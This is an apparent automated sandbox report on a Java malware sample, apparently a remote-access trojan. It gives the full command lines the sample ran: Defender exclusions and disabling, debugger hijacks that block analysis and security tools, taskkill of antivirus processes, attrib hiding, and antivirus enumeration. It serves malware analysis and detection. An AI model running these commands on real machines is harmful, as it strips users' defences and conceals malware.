PID 3488 wrote to memory of 4144	3488	java.exe	344
PID 3488 wrote to memory of 4144	3488	java.exe	344
PID 4144 wrote to memory of 1476	4144	cmd.exe	347
PID 4144 wrote to memory of 1476	4144	cmd.exe	347
PID 4144 wrote to memory of 1596	4144	cmd.exe	348
PID 4144 wrote to memory of 1596	4144	cmd.exe	348
PID 3488 wrote to memory of 4800	3488	java.exe	350
PID 3488 wrote to memory of 4800	3488	java.exe	350
PID 3488 wrote to memory of 4496	3488	java.exe	352
PID 3488 wrote to memory of 4496	3488	java.exe	352
PID 4800 wrote to memory of 1964	4800	cmd.exe	354
PID 4800 wrote to memory of 1964	4800	cmd.exe	354
PID 4800 wrote to memory of 1236	4800	cmd.exe	355
PID 4800 wrote to memory of 1236	4800	cmd.exe	355
PID 3488 wrote to memory of 584	3488	java.exe	356
PID 3488 wrote to memory of 584	3488	java.exe	356
PID 584 wrote to memory of 2120	584	cmd.exe	358
PID 584 wrote to memory of 2120	584	cmd.exe	358
PID 584 wrote to memory of 2176	584	cmd.exe	359
PID 584 wrote to memory of 2176	584	cmd.exe	359
PID 3488 wrote to memory of 4744	3488	java.exe	360
PID 3488 wrote to memory of 4744	3488	java.exe	360
PID 4744 wrote to memory of 3860	4744	cmd.exe	362
PID 4744 wrote to memory of 3860	4744	cmd.exe	362
PID 4744 wrote to memory of 5136	4744	cmd.exe	364
PID 4744 wrote to memory of 5136	4744	cmd.exe	364
PID 3488 wrote to memory of 5172	3488	java.exe	365
PID 3488 wrote to memory of 5172	3488	java.exe	365
PID 3488 wrote to memory of 5236	3488	java.exe	367
PID 3488 wrote to memory of 5236	3488	java.exe	367
PID 3488 wrote to memory of 5300	3488	java.exe	369
PID 3488 wrote to memory of 5300	3488	java.exe	369
PID 3488 wrote to memory of 5364	3488	java.exe	371
PID 3488 wrote to memory of 5364	3488	java.exe	371
PID 3488 wrote to memory of 5424	3488	java.exe	373
PID 3488 wrote to memory of 5424	3488	java.exe	373
PID 3488 wrote to memory of 5484	3488	java.exe	375
PID 3488 wrote to memory of 5484	3488	java.exe	375

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
3576	attrib.exe
3688	attrib.exe
2064	attrib.exe
3784	attrib.exe
852	attrib.exe
812	attrib.exe
1128	attrib.exe
3712	attrib.exe

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\REN42159.jar
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3488
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1652
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2324
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2648
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2696
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3596
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:3712
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:3576
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\tHFwB\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:3688
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\tHFwB\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:2064
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\tHFwB
  2⤵
  - Views/modifies file attributes
  PID:3784
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\tHFwB
  2⤵
  - Views/modifies file attributes
  PID:852
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\tHFwB
  2⤵
  - Views/modifies file attributes
  PID:812
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +s +r C:\Users\Admin\tHFwB\YIYZS.class
  2⤵
  - Views/modifies file attributes
  PID:1128
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2116
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:1588
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:1076
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\tHFwB','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\tHFwB\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3020
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4048
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
  2⤵
  PID:3880
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1432
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2784
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
  2⤵
  PID:2776
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1256
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
  2⤵
  PID:1744
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3788
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1080
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
  2⤵
  PID:1412
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1156
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:3904
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:2164
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:404
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:3684
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1748
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2776
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:3064
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1316
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1276
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:3000
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3788
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:4112
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4208
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4304
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4432
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4492
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4532
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4612
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4676
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4688
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:64
    3⤵
    PID:4844
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:32
    3⤵
    PID:4904
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4932
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:4968
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:5036
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4996
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5080
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    PID:5116
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:1244
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4020
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:3904
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:4128
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1008
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:4192
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:2776
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4228
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2788
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:772
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:1236
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4312
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:4268
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:3064
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1360
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:4152
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:4284
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4264
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:4512
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:4180
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4292
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:4464
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:2248
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4412
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:4224
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:4496
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4436
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2312
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:4752
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:4632
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4584
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:1316
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:4864
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4680
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    PID:4744
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:3372
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1144
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    PID:4924
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:4948
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4972
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:5096
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:612
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5056
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:64
    3⤵
    PID:5016
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:32
    3⤵
    PID:1904
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3856
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:1432
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:1148
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3892
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2776
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    PID:1268
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:2608
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1608
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:4160
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:3064
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4372
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    PID:4332
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:4520
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4180
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    PID:4560
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:4504
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4356
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4616
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:64
    3⤵
    PID:4540
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:32
    3⤵
    PID:4728
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4168
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    PID:4864
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:2784
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4812
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    PID:4916
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:5004
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:856
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    PID:4148
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:4804
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4888
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:64
    3⤵
    PID:584
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:32
    3⤵
    PID:2120
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5116
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4196
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4192
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1156
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2668
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1236
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1392
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:3788
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4332
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4520
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    PID:4640
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:4504
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4436
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    PID:4532
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:4788
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4728
